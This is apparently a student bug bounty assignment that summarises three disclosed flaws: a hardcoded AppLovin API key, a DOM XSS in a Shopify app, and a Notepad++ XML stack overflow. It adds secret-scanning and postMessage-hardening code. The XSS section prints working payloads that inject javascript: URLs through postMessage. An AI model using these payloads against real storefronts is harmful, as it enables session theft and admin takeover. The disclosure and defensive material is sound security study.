Sri Lanka Institute of Information Technology
Master of Science (Information Management) Degree Program
Information and Network Security
Assignment 3
Bug bounty
W.M.J.H. Fernando
MS18901290
AppLovin API Key hardcoded in a Github repo

They found Sensitive Data Exposure in the github/mopub-android-mediation project: the AppLovin UI API key is hardcoded in the source code. The main impact is that a production API key should not be shown publicly in a Github repo; otherwise it can be used by other developers. As it is company property and a monetised API key, it should be kept secure.

This key is used for initialization of the app, but an API key should not be disclosed publicly in a Github repo.

There are 2 perspective levels.

• Developer perspective
Every API key has a certain usage limit, and if other developers use this same key then the API key usage limit will get reduced.

• Attacker perspective
An attacker can use this key to violate the GDPR policy, because from May 25th 2018 AppLovin is compliant with GDPR and there are certain rules which need to be followed while building the app; if an attacker got this key he would violate the GDPR rules and it would be a huge problem for the company. These are some links:

• AppLovin GDPR policy link
1. https://www.applovin.com/privacy/
2. https://www.applovin.com/gdprfaqs/

• Mopub GDPR Publisher Integration Guide
1. https://developers.mopub.com/publishers/best-practices/gdpr-guide/

• As per Google AppLovin SDK Docs, EU consent and GDPR
1. https://developers.google.com/admob/android/mediation/applovin
Under the Google EU User Consent Policy, you must ensure that certain disclosures are given to, and consents obtained from, users in the European Economic Area (EEA) regarding the use of device identifiers and personal data. This policy reflects the requirements of the EU ePrivacy Directive and the General Data Protection Regulation (GDPR). When seeking consent, you must identify each ad network in your mediation chain that may collect, receive, or use personal data and provide information about each network's use. Google currently is unable to pass the user's consent choice to such networks automatically.

The best practice when committing code to a Github repo is that you shouldn't commit your application key, because you never know when things will go wrong. The API_KEY is always company property and it shouldn't be disclosed publicly.
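The check a team would add to catch this before a commit lands, as an added example (not the report's or the mopub project's code): a small scanner that flags string literals assigned to secret-looking identifiers and scores them by entropy. The Java snippet, the key value and the BuildConfig setup are constructed assumptions.

```javascript
// Added example (not from the report or the mopub project): a pre-commit
// style scanner that flags string literals assigned to secret-looking
// identifiers, so a production key is caught before it reaches a public repo.
// SAMPLE_JAVA is constructed; the key value is a placeholder, not a real key.

// Shannon entropy in bits per character: random API keys score high,
// ordinary words and log tags score low.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Matches `<name containing KEY/SECRET/TOKEN> = "<literal of 16+ chars>"`.
const SECRET_ASSIGN =
  /\b([A-Za-z0-9_]*(?:KEY|Key|SECRET|Secret|TOKEN|Token)[A-Za-z0-9_]*)\s*=\s*"([^"]{16,})"/;

// Returns one finding per line whose literal looks like a real secret.
function findHardcodedSecrets(sourceText, minEntropy = 3.5) {
  const findings = [];
  sourceText.split('\n').forEach((line, idx) => {
    const m = SECRET_ASSIGN.exec(line);
    if (!m) return;
    const [, name, value] = m;
    const entropy = shannonEntropy(value);
    if (entropy >= minEntropy) {
      findings.push({ line: idx + 1, name, entropy: Number(entropy.toFixed(2)) });
    }
  });
  return findings;
}

// Constructed Java adapter: line 3 hardcodes the key (the pattern the report
// found); line 5 reads it from a Gradle-injected BuildConfig field instead
// (assumed setup: the value lives in an untracked local.properties, not in git).
const SAMPLE_JAVA = [
  'public class AppLovinAdapterConfiguration {',
  '    // placeholder key for this example, not a real AppLovin key',
  '    private static final String SDK_KEY = "p7Qx2VzK9mN4bT1cR8wL3hY6sJ0uF5gA";',
  '    private static final String LOG_TAG = "AppLovinAdapterConfig";',
  '    private static final String SDK_KEY_SAFE = BuildConfig.APPLOVIN_SDK_KEY;',
  '}',
].join('\n');

// Runs the scanner over the constructed file; only line 3 should be reported.
function scanSample() {
  return findHardcodedSecrets(SAMPLE_JAVA);
}
```

Wiring `findHardcodedSecrets` into a pre-commit hook over staged files keeps the key out of history in the first place, which matters because a key that has been pushed once must be rotated, not just deleted.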
DOM XSS via Shopify.API.remoteRedirect

This report found a DOM XSS on the apple-business-chat app, which seems to be caused by a vulnerable JS file. For users who have installed this app, just let them use the theme code I provided to complete the XSS.

Modify the theme code to the following payload.

    <script>
    function attack(){
      let ctx=window.open('https://apple-business-chat-commerce.shopifycloud.com'),interval;
      let payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.domain)`);
      interval=setInterval(()=>{
        ctx && ctx.postMessage({
          "message":"Shopify.API.remoteRedirect",
          "data":{
            "location":`javascript:eval(atob('${payload}'))`
          }
        },location.origin);
      },500);
      window.onmessage=(e)=>{
        e.data==="success"&&(
          console.log('attack success'),
          window.onmessage=null,
          clearInterval(interval)
        );
      };
    }
    attack();
    </script>
    <a href="javascript:attack()" style="display:block;text-align:center;width:100%;height:300px;line-height:300px;background:#000;color:#fff;">click me start attack</a>
As shown below. Then click on the storefront page to trigger it.

Impact
Steal session information, add administrators, etc.
Another API is also affected by XSS:

    postMessage({
      "message":"Shopify.API.Bar.initialize",
      "data":{
        pagination: {
          next: {
            href: "javascript:alert(document.domain)",
            target: "new"
          },
          previous: {
            href: "javascript:alert(document.domain)",
            target: "new"
          }
        }
      }
    });
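The fix on the receiving side for both messages above (remoteRedirect and Bar.initialize), as an added example that is not Shopify's code: the handler checks the sender's origin and resolves every navigation target through the URL parser, accepting only http(s) schemes, so a `javascript:` location is dropped rather than evaluated. The allowed origin, the admin base URL and the message shapes are assumptions for this example.

```javascript
// Added example (not Shopify's code): a hardened receiver for the two message
// types in the report. Sender origin is checked and only http(s) targets are
// accepted, so `javascript:` locations are dropped instead of evaluated.
// Origins, ADMIN_BASE and the message shapes are assumptions for this example.
const ALLOWED_SENDER_ORIGINS = new Set(['https://app.example-partner.com']);
const ADMIN_BASE = 'https://example.myshopify.com/admin/';

// Resolve href against the admin base and allow only http/https targets.
// Returns the absolute URL, or null when the target must not be navigated to.
function safeNavigationTarget(href) {
  if (typeof href !== 'string') return null;
  let url;
  try {
    url = new URL(href, ADMIN_BASE);
  } catch (_e) {
    return null; // unparsable URL
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  return url.href;
}

// Returns the action the page may perform, or null if the message is rejected.
function handleEmbeddedAppMessage(event) {
  if (!ALLOWED_SENDER_ORIGINS.has(event.origin)) return null;
  const msg = event.data;
  if (!msg || typeof msg !== 'object') return null;
  if (msg.message === 'Shopify.API.remoteRedirect') {
    const target = safeNavigationTarget(msg.data && msg.data.location);
    return target ? { action: 'redirect', to: target } : null;
  }
  if (msg.message === 'Shopify.API.Bar.initialize') {
    const pagination = (msg.data && msg.data.pagination) || {};
    const links = {};
    for (const key of ['next', 'previous']) {
      const target = safeNavigationTarget(pagination[key] && pagination[key].href);
      if (target) links[key] = target; // unsafe links are silently dropped
    }
    return { action: 'initialize', pagination: links };
  }
  return null; // unknown message type
}

if (typeof window !== 'undefined') { // browser only; absent under Node
  window.addEventListener('message', (event) => {
    const action = handleEmbeddedAppMessage(event);
    if (action && action.action === 'redirect') window.location.assign(action.to);
  });
}

// Constructed messages mirroring the report's payloads.
const maliciousRedirect = {
  origin: 'https://app.example-partner.com',
  data: { message: 'Shopify.API.remoteRedirect',
          data: { location: 'javascript:eval(atob("..."))' } },
};
const benignRedirect = {
  origin: 'https://app.example-partner.com',
  data: { message: 'Shopify.API.remoteRedirect', data: { location: '/admin/orders?page=2' } },
};
```

Tightening `safeNavigationTarget` further to a same-origin allowlist would also close open-redirect abuse of remoteRedirect, at the cost of blocking legitimate cross-origin app flows.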
Stack overflow in XML Parsing

Summary:
A stack buffer overflow vulnerability has been detected in the XML parsing functionality of Notepad++ v7.6.2 (32 bits). This is due to the fact that the _invisibleEditView.getText function doesn't check buffer boundaries.

Description:
Vulnerability src file: notepad-plus-plus/PowerEditor/src/Notepad_plus.cpp
Vulnerability line: line 1008
Variable affected: char encodingStr[128];
Function that overflows buffer: _invisibleEditView.getText

Steps to Reproduce:
1. Create a .xml file with a correct XML format.
2. Introduce a big XML field that overflows the "encodingStr" buffer.
3. Open the file with Notepad++ and the application should crash.

Supporting Material/References:
• BoF_example1.xml -> Exploit example

Impact
An attacker could create a malicious .xml file that triggers a stack buffer overflow on the victim's machine. You only need to open the attached .xml file example with Notepad++ to reproduce the exploit.